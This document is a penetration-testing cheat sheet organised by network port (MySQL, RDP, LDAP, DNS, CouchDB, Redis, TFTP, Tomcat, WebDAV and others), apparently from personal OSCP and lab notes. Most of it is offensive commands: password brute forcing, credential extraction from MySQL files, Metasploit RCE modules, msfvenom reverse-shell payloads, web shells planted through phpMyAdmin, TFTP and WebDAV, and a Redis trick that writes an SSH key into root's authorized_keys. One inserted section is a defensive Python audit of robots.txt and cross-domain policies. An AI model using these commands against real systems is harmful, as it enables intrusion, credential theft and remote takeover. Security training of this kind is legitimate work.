--------------------------------------------------------------------------------

# 3306 (MySQL)

## Enumeration

### Checks

* [ ] Try default credentials "root":""
* [ ] Brute force credentials
* [ ] Check database content for new passwords
* [ ] Check version for exploits

### Connection

#### Local

```bash
mysql -u root # Connect as root without a password
mysql -u root -p # A password will be prompted for
```

#### Remote

```bash
mysql --host= -u root -p
mysql -h -u root
mysql -h -u root@localhost
```

### nmap

```bash
kali@kali:~/oscp/labs/10.11.1.8$ nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
nmap -sV -Pn --script=mysql-audit.nse,mysql-brute.nse,mysql-databases.nse,mysql-dump-hashes.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-query.nse,mysql-users.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 -o 3306_nmap_mysql
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
```

### Metasploit

```bash
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
```

### Extract Credentials

```bash
cat /etc/mysql/debian.cnf
grep -oaE "[-_.*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```

## Brute Force

### Hydra

```bash
hydra -L -P mysql -vV -I -u
```

--------------------------------------------------------------------------------
/pentesting-network/3389-rdp.md:
--------------------------------------------------------------------------------

# 3389 (RDP)

## Enumeration

### Checks

* [ ] Check if you can log in with the default guest account and a blank password
* [ ] Check if you can brute force users
* [ ] Check for BlueKeep

### nmap

```bash
nmap -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 -o 3389_nmap_rdp
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4
```

### Check known credentials

```bash
rdp_check /:@ # rdp_check.py from impacket
```

### Manual Login

#### rdesktop

```bash
rdesktop
# Try default guest account "guest":""
rdesktop -u guest -g 94%
rdesktop -u guest -p guest -g 94%
# Use known credentials
rdesktop -u
rdesktop -d -u -p
```

#### xfreerdp

```bash
xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:[IP] /u:bitbucket /p:[PW]

xfreerdp /u:username /p:password /cert:ignore /v:MACHINE_IP
xfreerdp /u:[DOMAIN\] /p: /v:

xfreerdp /u:[DOMAIN\] /pth: /v:

xfreerdp /u:[domain\] /p: /v:
xfreerdp /u:[domain\] /pth: /v:
```

## Brute Force

#### ncrack

```bash
ncrack -vv --user Administrator -P /usr/share/wordlists/rockyou.txt rdp://
ncrack -vv --user Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt rdp://
```

#### Hydra

```bash
hydra -l username -P /usr/share/wordlists/rockyou.txt -t 5 -V ip_address rdp
hydra -f -L -P rdp:// -u -vV
```

#### crowbar

```bash
crowbar -b rdp -s /CIDR -u -C
crowbar -b rdp -s /CIDR -U -C
```

--------------------------------------------------------------------------------
/pentesting-network/3632-distcc.md:
--------------------------------------------------------------------------------

# 3632 (distcc)

## Searchsploit

```bash
searchsploit # Use searchsploit on the nmap service output details
```

## Exploitation Checks

Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code:

```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 --script distcc-exec --script-args="distcc-exec.cmd='id'"
```

--------------------------------------------------------------------------------
/pentesting-network/389-ldap.md:
--------------------------------------------------------------------------------

# 389 (LDAP)

## Enumeration

### Anonymous

#### ldapsearch

New Syntax

```bash
ldapsearch -H ldap:// -x -b "DC=hutch,DC=offsec"
ldapsearch -H ldap://192.168.71.122 -x -b "CN=Users,DC=hutch,DC=offsec" # Get user info
# Look for any plaintext passwords in the description field
ldapsearch -H "ldap://" -v -x -b "DC=hutch,DC=offsec" "(objectclass=*)"

# If LAPS is found on the server, can look for the admin password
ldapsearch -H ldap:// -v -x -D @HUTCH.OFFSEC -w -b "DC=hutch,DC=offsec" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
```

Old Syntax

```bash
ldapsearch -h -x -s base namingcontexts # Look for the dn: i.e. DC=htb,DC=local
ldapsearch -h -x -b "DC=htb,DC=local" > ldap-anonymous.out # All ldap info we can query as anonymous
ldapsearch -h -x -s sub -b "DC=htb,DC=local"
ldapsearch -h -x -b "DC=htb,DC=local" '(objectClass=Person)' # Look at user info
ldapsearch -h -x -b "DC=htb,DC=local" '(objectClass=Person)' sAMAccountName
# Grab just the usernames to try and brute force/password spray
ldapsearch -h -x -b "DC=htb,DC=local" '(objectClass=Person)' sAMAccountName | grep sAMAccountName | awk '{print $2}' > userlist.ldap # Make it easier to do a password spray
# Can try to check the password policy with crackmapexec
crackmapexec smb --pass-pol -u '' -p '' # Using null user & password
# Look for 'Account lockout threshold: 0' # Ideal for brute force
# Brute Force
crackmapexec smb -u userlist.txt -p pwlist.txt
```

#### nmap

```bash
nmap -n -sV --script "ldap* and not brute" # Using anonymous credentials
```

### Authenticated

#### ldapdomaindump

```bash
kali@kali:~/ctf/tryhackme/enterprise$ ldapdomaindump 10.10.55.72 -u 'LAB-ENTERPRISE\nik' -p ToastyBoi! -o ldapdomaindumpdir
```

--------------------------------------------------------------------------------
/pentesting-network/464-kpasswd.md:
--------------------------------------------------------------------------------

# 464 (kpasswd)

## nmap output

```bash
464/tcp open kpasswd5?
```

> The fact you're seeing this service and port suggests you may be scanning a Domain Controller, for which both UDP & TCP ports 464 are used by the Kerberos Password Change. This port in particular is used for changing/setting passwords against Active Directory.
>
> [https://security.stackexchange.com/questions/205492/what-is-this-service](https://security.stackexchange.com/questions/205492/what-is-this-service)

--------------------------------------------------------------------------------
/pentesting-network/53-dns.md:
--------------------------------------------------------------------------------

# 53 (DNS)

## Enumeration

When port 53 shows up, you can add the IP of the host to the resolv.conf file:

`nameserver `

### Hostname Leak

#### nslookup

```bash
nslookup
> server
> 127.0.0.1
> 127.0.0.2
>
```

### Banner Grabbing

```bash
dig version.bind CHAOS TXT @DNS
```

### More Info

#### nslookup

```bash
root@INE:~# nslookup
> server 192.212.168.3
> set q=NS # Can also change per record type, i.e. A, MX, etc.
> witrap.com # Change the hostname as needed
# Should return additional domains
```

#### dnsenum

```bash
dnsenum target # Zone transfer
```

#### nmap

```bash
nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport"
nmap --script dns-nsid
```

#### gobuster

```bash
gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
```

#### Metasploit

```bash
auxiliary/gather/enum_dns # Perform enumeration actions
```

### Zone Transfers

#### dig / fierce

```bash
dig axfr @ns1.test.com
dig axfr @ # Try zone transfer without domain
dig axfr @ # Try zone transfer guessing the domain
fierce --domain --dns-servers # Will try to perform a zone transfer against every authoritative name server and, if this doesn't work, will launch a dictionary attack
dig @192.212.168.3 witrap.com -t AXFR +nocookie
```

#### Host

```bash
# Zone transfer
sudo vim /etc/hosts
10.10.10.123 friendzone.red
host -l friendzone.red 10.10.10.123 # Zone transfer: host -l <zone> <server>
host -t axfr witrap.com 192.212.168.3
```

#### dnsrecon

```bash
dnsrecon -d target.com -t axfr # Zone Transfer
dnsrecon -d target.com -D words.txt -t brt # Brute force domain
dnsrecon -d -a
```

## Brute Force

### Reverse

#### dnsrecon

```bash
dnsrecon -d
dnsrecon -d active.htb -a -n # Zone transfer
dnsrecon -r 127.0.0.0/24 -n -d # DNS reverse of all of the addresses
dnsrecon -r 127.0.0.1/24 -n -d # DNS reverse of all of the addresses
dnsrecon -r /24 -n # DNS reverse of all of the addresses
dnsrecon -d -r 10.0.0.0/8
```

### Subdomain

#### dnsrecon / dnscan

```bash
dnsrecon -D subdomains-1000.txt -d -n
dnscan -d -r -w subdomains-1000.txt # Brute force subdomains recursively, https://github.com/rbsec/dnscan
```

#### Other

```
https://github.com/blark/aiodnsbrute
```

--------------------------------------------------------------------------------
/pentesting-network/5432-postgresql.md:
--------------------------------------------------------------------------------

# 5432 (postgresql)

## Enumeration

### Connection

#### Default Credentials

`postgres:postgres`

```bash
psql -U # Open psql console with user
psql -h -U -d # Remote connection
psql -h -p -U -W # Remote connection
```

### Commands

```sql
psql -h localhost -d -U # Password will be prompted
\list # List databases
\c # Use the database
\d # List tables
\du+ # Get user roles
```

## Exploitation

### RCE - Authenticated

#### searchsploit
```bash
kali@kali:~/Documents/offsec/oscp/proving_grounds/Nibbles$ searchsploit postgresql
--------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                   | Path
--------------------------------------------------------------------------------- ---------------------------------
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)                | multiple/remote/50847.py
--------------------------------------------------------------------------------- ---------------------------------
```

--------------------------------------------------------------------------------
/pentesting-network/5900-vnc.md:
--------------------------------------------------------------------------------

# 5900 (VNC)

## Checks

* [ ] Check for easy VNC passwords
* [ ] Check for exploits for the VNC version
* [ ] Brute force VNC password

## Enumeration

### nmap

```bash
nmap -sV -Pn -p 5900 --script=vnc-info,vnc-title,realvnc-auth-bypass -oA 5900_nmap_VNC
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5900,5800
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -v -p
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p
```

### Metasploit

#### Login Scan

```bash
use auxiliary/scanner/vnc/vnc_login
set rhosts
run
```

#### No-auth Scan

```bash
use auxiliary/scanner/vnc/vnc_none_auth
set rhosts
run
```

#### Post exploit module

```bash
background
use post/windows/gather/credentials/vnc
set session X
exploit

vncviewer 192.168.1.109
```

## Connection

```bash
vncviewer [-passwd passwd.txt] ::5901
vncviewer :
```

## Brute Force

```bash
hydra -s 5900 -P /usr/share/seclists/Passwords/darkweb2017-top10.txt -t 30 vnc
hydra -L -P -s vnc -u -vV
```

--------------------------------------------------------------------------------
/pentesting-network/5984-6984-couchdb.md:
--------------------------------------------------------------------------------

# 5984, 6984 (CouchDB)

## Enumeration

### Automatic

```bash
nmap -sV --script couchdb-databases,couchdb-stats -p
msf> use auxiliary/scanner/couchdb/couchdb_enum
```

### Manual

```bash
curl http://:5984
# Banner grab (can also open in a browser)
curl http://:5984/_all_dbs
# List of all the databases
curl http://user:password@:5984/_all_dbs
# List of all the databases with authentication
curl http://:5984/
# List database information
curl http://:5984//_all_docs
# List each entry inside of a database
curl http://:5984//
# Read the content of a document in a database
curl http://10.10.202.192:5984/_utils/
# Path for the web administration tool
```

## Exploitation

### Unprotected

#### CVE-2017-12636

Since we should have administrative access here, we should be able to find an exploit to execute.

* Found: [https://github.com/moayadalmalat/CVE-2017-12636](https://github.com/moayadalmalat/CVE-2017-12636)
* Download the code and update the **target** and **command** variables in the script
* Start a netcat listener: `nc -lvnp 4444`
* Run the exploit: `python3 exploit.py`

### Protected

Since we do NOT have access, we will need to get access.
#### Brute Force

Hydra

```bash
hydra -l admin -P /opt/100-common-passwords.txt -s 5984 -f http-get /_utils
# And we get the password
```

Metasploit

```bash
use auxiliary/scanner/couchdb/couchdb_login
set RHOSTS demo2.ine.local
set USERNAME admin
set PASS_FILE /root/Desktop/wordlists/100-common-passwords.txt
set STOP_ON_SUCCESS True
set VERBOSE true
exploit
```

#### RCE

Metasploit

```bash
search couchdb
use exploit/linux/http/apache_couchdb_cmd_exec
set PAYLOAD linux/x64/meterpreter/bind_tcp
set RHOSTS
set LHOST
set httpusername admin
set httppassword madalina
exploit
```

--------------------------------------------------------------------------------
/pentesting-network/5985-winrm.md:
--------------------------------------------------------------------------------

# 5985 (WinRM)

## Enumeration

## Connection

#### crackmapexec

```bash
crackmapexec winrm -u -p
crackmapexec winrm -u -p -X "whoami" # Run a command
```

#### evil-winrm

PowerShell Remoting

```bash
# Attempt to log into the machine
evil-winrm -i -u -p
evil-winrm -i -u -H
# Specify a local directory to execute scripts from
evil-winrm -i -u -p -s .
```

Upload File to Target

```bash
# From compromised target
Evil-WinRM PS C:\Users\FSmith\Documents> upload winPEAS.exe
Evil-WinRM PS C:\Users\FSmith\Documents> .\winPEAS.exe
```

Download File from Target

```bash
# From compromised target
Evil-WinRM PS C:\Users\FSmith\Documents> download 123_BloodHound.zip
```

--------------------------------------------------------------------------------
/pentesting-network/6379-redis.md:
--------------------------------------------------------------------------------

# 6379 (Redis)

## Enumeration

### Automatic

#### nmap

```bash
nmap --script redis-info -sV -p 6379
```

#### Metasploit

```bash
msf> use auxiliary/scanner/redis/redis_server
```

### Manual

#### Telnet, Netcat, Redis-cli

```bash
telnet 6379
nc -vn 6379
redis-cli -h
```

Commands:

```bash
# Check version info etc. as well as the ability to run commands without auth
INFO
# List all the stored keys
KEYS *
# Get the value of a stored key
GET
# Other
config get *
config get dir
```

#### Curl Gopher

```
curl gopher://demo1.ine.local:6379/_GET%20flag --max-time 1
```

#### LFI

If LFI is found, you can enumerate the local file system for interesting files:

```bash
# Look at the redis configuration file (check for passwords)
/etc/redis/redis.conf
# Look for the web DocumentRoot in the conf file
/etc/apache2/sites-enabled/000-default.conf # Ex: apache2
# Look at the redis service file (check for ReadWriteDirectories)
/etc/systemd/system/redis.service
```

Attempt to write a file to a directory that is found in the web root or is listed under ReadWriteDirectories.

## Exploitation

### PHP Web Shell

```bash
redis-cli -h -a
192.168.97.166:6379> config set dir /opt/redis-files
OK
192.168.97.166:6379> config set dbfilename rce.php
OK
192.168.97.166:6379> set test "" # or
192.168.97.166:6379> set test "" # or
192.168.97.166:6379> set test ""
OK
192.168.97.166:6379> save
OK
```

### Rogue Server

[https://github.com/n0b0dyCN/redis-rogue-server](https://github.com/n0b0dyCN/redis-rogue-server)

```bash
git clone https://github.com/n0b0dyCN/redis-rogue-server
cd redis-rogue-server/
./redis-rogue-server.py --rhost 192.168.76.69 --lhost 127.0.0.1
# or
python3 redis-rogue-server.py --rhost 192.168.76.69 --rport 6379 --lhost 192.168.49.76 --lport 6379
```

### Load Redis Module

> Need a way to place files (modules) onto the machine, i.e. FTP

[https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand)

```bash
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand
make # Creates the module.so file
ftp
put module.so # Place the module in a writable directory
# Identify the ftp directory location, e.g. vsFTPd = /var/ftp/
redis-cli -h
127.0.0.1:6379> MODULE LOAD /var/ftp/pub/module.so
127.0.0.1:6379> system.exec "id"
```

### Unauthenticated Redis Server

#### Metasploit

```bash
msfconsole
search redis
use exploit/linux/redis/redis_replication_cmd_exec
set RHOSTS
set LHOST
set SRVHOST
exploit
```

### Overwriting Arbitrary Files

#### Redis-cli

```bash
# Generate Key Pair
ssh-keygen -f ssh-key # Key pair saved as ssh-key / ssh-key.pub (used below)

# Copy key file and place onto Redis server naming it test
# Ex: 1
(echo -e "\n\n"; cat /root/ssh-key.pub; echo -e "\n\n") > key
cat key | redis-cli -h demo2.ine.local -x set test
# Ex: 2
(echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > spaced_key.txt
cat spaced_key.txt | redis-cli -h -x set ssh_key
cat spaced_key.txt | redis-cli -h 192.168.97.166 -a -x set ssh_key
# Dump the key to the target machine /root/.ssh/ directory using redis-cli
redis-cli -h demo2.ine.local
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
save
# We have successfully uploaded the public key as authorized_keys.
# Access the target machine
ssh -i ssh-key root@demo2.ine.local
```

#### Metasploit

```bash
use auxiliary/scanner/redis/file_upload
set RHOSTS demo2.ine.local
set LocalFile /root/key
set RemoteFile /root/.ssh/authorized_keys
exploit
```

### Attacking Protected Redis

#### Metasploit

```bash
use auxiliary/scanner/redis/redis_login
set RHOSTS demo3.ine.local
exploit
# We found a credential
redis-cli -h demo3.ine.local
AUTH daniel
KEYS *
GET
```

### Eval Abuse

> CTF Ex: Doing some research, it is found that abuse of eval and dofile can be used

```bash
# Get the contents of the user.txt file
redis-cli -h -p 6379 eval "dofile('C:\\\Users\\\enterprise-security\\\Desktop\\\user.txt')" 0
```

## Brute Force

```bash
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379
hydra -P /path/pass.txt redis://: # 6379 is the default
```

--------------------------------------------------------------------------------
/pentesting-network/6667-irc.md:
--------------------------------------------------------------------------------

# 6667 (IRC)

## Enumeration

### nmap

```bash
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 irked.htb
```

## Brute Force

### nmap

```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p
```

--------------------------------------------------------------------------------
/pentesting-network/69-tftp.md:
--------------------------------------------------------------------------------

# 69 (TFTP)

## Enumeration

### Checks

* [ ] Search for files to find sensitive info like passwords
* [ ] Upload shells to trigger them in a webapp

### nmap

```bash
nmap -sU -p 69 --script tftp-enum.nse
nmap -n -Pn -sU -p69 -sV --script tftp-enum
```

### Connection

```bash
# Set up the connection
tftp 172.16.200.100
# Get a file
tftp> get /etc/passwd
# Upload reverse shell
tftp> put shell.php

# Needs unauthenticated access
tftp
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]
```

### Metasploit

```bash
msfconsole
use tftpbrute
set dictionary /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt

msf5> auxiliary/admin/tftp/tftp_transfer_util
```

--------------------------------------------------------------------------------
/pentesting-network/79-finger.md:
--------------------------------------------------------------------------------

# 79 (Finger)

## Enumeration

### Banner Grabbing

```bash
nc -vn 79
echo "root" | nc -vn 79
```

### nmap

```bash
nmap -vvv -Pn -sC -sV -p79
```

### finger

```bash
finger @
finger @
finger @ #List users
finger admin@ #Get info of user
finger user@ #Get info of user
```

### finger-user-enum

```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```

### Metasploit

```bash
use auxiliary/scanner/finger/finger_users
```

## Command Execution

```bash
finger "|/bin/id@"
finger "|/bin/ls -a /"

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
--------------------------------------------------------------------------------
/pentesting-network/80-443-http-s/README.md:
--------------------------------------------------------------------------------

# 80,443 (HTTP/S)

## Enumeration

### Initial Checks

* [ ] Check for any CMS or vendor details by opening the page in a browser
* [ ] Burp (Add to scope)
* [ ] Enumerate links
* [ ] Enumerate input boxes (SQLi, XSS, Command Injection)
* [ ] Directory busting (ffuf, gobuster, dirb, wfuzz)
* [ ] Vulnerability Scanning (nikto, CMS scanner)
* [ ] DNS, Virtual hosts, etc. (dig)
* [ ] Subdomain busting (ffuf, gobuster, wfuzz, Assetfinder, Amass)
* [ ] Parameter busting (ffuf, gobuster, wfuzz)
* [ ] Brute force any login forms
* [ ] Potential usernames found, i.e. about\_us.html
  * [ ] Copy names to a file; script to permute found names into potential usernames
  * [ ] Ex: Fergus Smith, Fergus.Smith, FSmith, F.Smith
* [ ] CeWL - create a wordlist based off of words found online
  * [ ] `cewl -d 7 -m 8 --with-numbers -w cewl.out `
* [ ] Check SSL/TLS certificates for information and vulnerabilities
  * [ ] Subject Alt Names, Heartbleed, etc.
  * [ ] `sslscan `

### Manual

#### Initial Pages

* /robots.txt
* /sitemap.xml
* /crossdomain.xml
* /clientaccesspolicy.xml
* /.well-known/
* Check also the comments in the main and secondary pages.
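The files above are the first thing anyone reviewing a site reads, so it is worth checking what your own copies give away. The following is an added example, not part of the original notes and not a tool they reference: a small Python audit that pulls the Disallow paths out of a robots.txt and flags those that hint at sensitive areas, and that flags wildcard or insecure entries in a Flash crossdomain.xml and a Silverlight clientaccesspolicy.xml. The three sample files are constructed, and the SENSITIVE_HINTS list is an assumption you would tune per site.

```python
# Added example (not part of the original notes): audit a site's own copies of
# robots.txt, crossdomain.xml and clientaccesspolicy.xml for what they give away.
# The sample file contents below are constructed, and SENSITIVE_HINTS is an
# assumed list of path fragments worth reviewing; tune it per site.
import re
import xml.etree.ElementTree as ET

# Constructed sample: a robots.txt that advertises the very paths it wants hidden.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /admin/
Disallow: /backup/   # old database dumps
Disallow: /wp-admin/
Disallow:
Allow: /public/
Sitemap: https://example.test/sitemap.xml
"""

# Constructed sample: a Flash cross-domain policy trusting every origin.
SAMPLE_CROSSDOMAIN = """<cross-domain-policy>
  <allow-access-from domain="*" />
  <allow-access-from domain="*.example.test" secure="false" />
</cross-domain-policy>
"""

# Constructed sample: a Silverlight client access policy with the same problem.
SAMPLE_CLIENTACCESS = """<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*" />
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true" />
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>
"""

# Assumed: path fragments that usually mean "something here is worth a second look".
SENSITIVE_HINTS = ("admin", "backup", "config", "private", "secret", "upload", "wp-")


def robots_disallowed(text):
    """Return every non-empty Disallow path (comments stripped, order kept)."""
    paths = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        match = re.match(r"(?i)disallow:\s*(\S+)", line)
        if match:
            paths.append(match.group(1))
    return paths


def robots_findings(text):
    """Disallow paths that contain one of the sensitive hints."""
    return [p for p in robots_disallowed(text)
            if any(hint in p.lower() for hint in SENSITIVE_HINTS)]


def crossdomain_findings(xml_text):
    """Flag allow-access-from entries with a wildcard domain or secure="false"."""
    findings = []
    for el in ET.fromstring(xml_text).iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append("wildcard domain '*'")
        if el.get("secure", "true").lower() == "false":
            findings.append(f"secure=false for '{domain}'")
    return findings


def clientaccess_findings(xml_text):
    """Flag wildcard domains and unrestricted request headers in a client access policy."""
    findings = []
    for allow in ET.fromstring(xml_text).iter("allow-from"):
        if allow.get("http-request-headers") == "*":
            findings.append("all request headers allowed")
        for dom in allow.iter("domain"):
            if dom.get("uri") == "*":
                findings.append("wildcard domain uri '*'")
    return findings


if __name__ == "__main__":
    print("robots.txt Disallow paths:", robots_disallowed(SAMPLE_ROBOTS))
    print("robots.txt worth reviewing:", robots_findings(SAMPLE_ROBOTS))
    print("crossdomain.xml:", crossdomain_findings(SAMPLE_CROSSDOMAIN))
    print("clientaccesspolicy.xml:", clientaccess_findings(SAMPLE_CLIENTACCESS))
```

Run it against the real files fetched from your own site; an empty findings list for the two XML policies and a short, uninformative Disallow list are what you want to see. Anything that robots.txt has to hide is better protected by authentication than by asking crawlers to look away.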
#### DevTools

* View page source
* View Network tab
* View Cookies

#### cURL

```bash
# Check Headers
curl -I https://academy.hackthebox.eu
# Check Source Code
curl https://academy.hackthebox.eu
```

### Automatic

#### nmap

```bash
nmap -sV --script http-*
nmap -sV --script http-vuln*
nmap -sV --script http--*
```

#### whatweb

```bash
whatweb # Basic
whatweb -v # Verbose
whatweb -a 1 # Stealthy
whatweb -a 3 # Aggressive
```

#### nikto

Basic

```bash
nikto -h -o nikto.txt # Output to file. Also: csv, html, and xml available
nikto -h | tee nikto.log # Alternate option for file output
nikto -h -ssl | tee nikto.log # For SSL enabled sites
# Multiple hosts
nikto -h -p # Multiple Ports
```

Plugins

```bash
nikto --list-plugins
nikto -h <IP> -Plugin apacheuser
nikto -h <IP> -Plugin cgi
nikto -h <IP> -Plugin robots
nikto -h <IP> -Plugin dir_traversal
```

Vulnerability Tuning

```bash
nikto -h -Tuning 0 # File Upload
nikto -h -Tuning 2 # Misconfigurations / Default Files
nikto -h -Tuning 3 # Information Disclosure
nikto -h -Tuning 4 # Injection
nikto -h -Tuning 8 # Command Execution
nikto -h -Tuning 9 # SQL Injection
```

### CMS Scanners

#### cmseek

```bash
cmseek -u http:// -v
```

#### cmsmap

```bash
cmsmap.py http://
```

LIST OF CMS TYPES LINKING TO THEIR PAGE...

## Directory Busting

### dir

Common extensions: php,txt,js,xml,html,pdf,old,bak,xxx,tar,zip,asp,aspx

#### gobuster

* /usr/share/seclists/Discovery/Web-Content/big.txt
* /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
* /usr/share/seclists/Discovery/Web-Content/common\*
* /usr/share/seclists/Discovery/Web-Content/directory-list-\*
* /usr/share/seclists/Discovery/Web-Content/raft-\*

```bash
gobuster dir -u -w -x -o
gobuster dir -u http://www.holo.live/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php -o gobuster_dir_80
```

### vhost

#### gobuster

* /usr/share/seclists/Discovery/DNS/subdomains-top1million-\*

```bash
gobuster vhost -u -w
gobuster vhost -u holo.live -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
gobuster vhost -u http://www.holo.live/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
```

### fuzz

#### gobuster

```bash
gobuster fuzz -u ?= -w --exclude-length
gobuster fuzz -u http://admin.holo.live/dashboard.php?FUZZ=ls+-la -w /usr/share/seclists/Discovery/Web-Content/big.txt --exclude-length 0
gobuster fuzz -u http://192.168.212.212/secret/evil.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --exclude-length 0
```

#### ffuf

```bash
ffuf -u http://192.168.212.212/secret/evil.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fs 0
```

## Web Vulnerabilities

LINK TO WEB VULNS.....

### Server Side

[SQL Injection](../../pentesting-web/sqli-sql-injection.md)

[Authentication](../../pentesting-web/authentication.md)

[Directory Traversal](../../pentesting-web/directory-traversal.md)

[Command Injection](../../pentesting-web/command-injection/)

[File Upload Vulnerabilities](../../pentesting-web/unrestricted-file-upload.md)

Server-Side Request Forgery (SSRF)

[XXE Injection](../../pentesting-web/xxe-xml-external-entity.md)

### Client Side

[Cross-Site Scripting (XSS)](../../pentesting-web/xss-cross-site-scripting/)

Cross-Site Request Forgery (CSRF)

--------------------------------------------------------------------------------
/pentesting-network/80-443-http-s/drupal.md:
--------------------------------------------------------------------------------

# Drupal

## Scanning

### drupwn

```bash
drupwn enum http://
```

### droopescan

```bash
droopescan scan -u http://
```

--------------------------------------------------------------------------------
/pentesting-network/80-443-http-s/joomla.md:
--------------------------------------------------------------------------------

# Joomla

## Interesting Files

* /administrator
* /administrator/manifests/files/joomla.xml
* /language/en-GB/en-GB.xml

## Scanning

### joomscan

```bash
perl joomscan.pl -u
```

## Exploitation

### Templates

View a template, copy the template and rename it, select the newly created template, modify its index.php file with PHP reverse shell code, and save. Start a netcat listener and navigate to the new template at /templates/shelly.

After getting onto the filesystem, look at the web directory.

--------------------------------------------------------------------------------
/pentesting-network/80-443-http-s/node.js.md:
--------------------------------------------------------------------------------

# Node.js

## Exploitation

### Eval RCE

1. Intercept the request
   1. Test parameters for URL/base64 encoding
   2. Test parameters for arithmetic evaluation, i.e. 1+1, and see if the response contains 2.

Example: Dibble on Proving Grounds

--------------------------------------------------------------------------------
/pentesting-network/80-443-http-s/phpmyadmin.md:
--------------------------------------------------------------------------------

# phpMyAdmin

## Enumeration

Default credentials: `root:`

## Exploitation

### Web Shell

1. Identify the web server path. Ex: Wamp server is C:/wamp/www/
2. Create a web shell file via an SQL query in phpMyAdmin
   1. `select "" into outfile "C:/wamp/www/shell.php"`
3. Navigate to the path of the uploaded shell and execute a command:
   1. http://\/shell.php?cmd=whoami
4. If successful, command execution is available.

--------------------------------------------------------------------------------
/pentesting-network/80-443-http-s/tomcat.md:
--------------------------------------------------------------------------------

# Tomcat

## Exploitation Checks

* Open Tomcat Manager
  * Check to see if any of the default credentials will work to log in. Common ones:
    * `admin:admin`
    * `tomcat:tomcat`
    * `admin:`
    * `admin:s3cr3t`
    * `tomcat:s3cr3t`
    * `admin:tomcat`
  * If so, we may be able to upload a war file to get a reverse shell.
  * After uploading and deploying the war file, we can start a `netcat` listener, then select the war file from the Application Path column in Tomcat.
* Open Tomcat Administration
  * Check to see if any of the default credentials will work to log in.
* Check the **/manager/status** path to look for version details and then known exploits, especially if you cannot access **/manager/html**.

### MSFvenom Reverse Shell

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shellw.war
```

### Metasploit

```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost
msf exploit(multi/http/tomcat_mgr_upload) > set rport
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```

## Brute Force

### Hydra

```bash
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
```

### Metasploit

```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```

--------------------------------------------------------------------------------
/pentesting-network/80-443-http-s/webdav.md:
--------------------------------------------------------------------------------

# WebDAV

## Scanning

### nmap

```bash
nmap --script=http-webdav-scan,http-iis-webdav-vuln
# Check for the HTTP methods, especially PUT
```

### cadaver

```bash
cadaver
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx awen.txt # Example uploading shell
dav:/> mv awen.txt awen.aspx # Change the file type of the uploaded file
# Navigate to the awen.aspx file in the browser
```

```bash
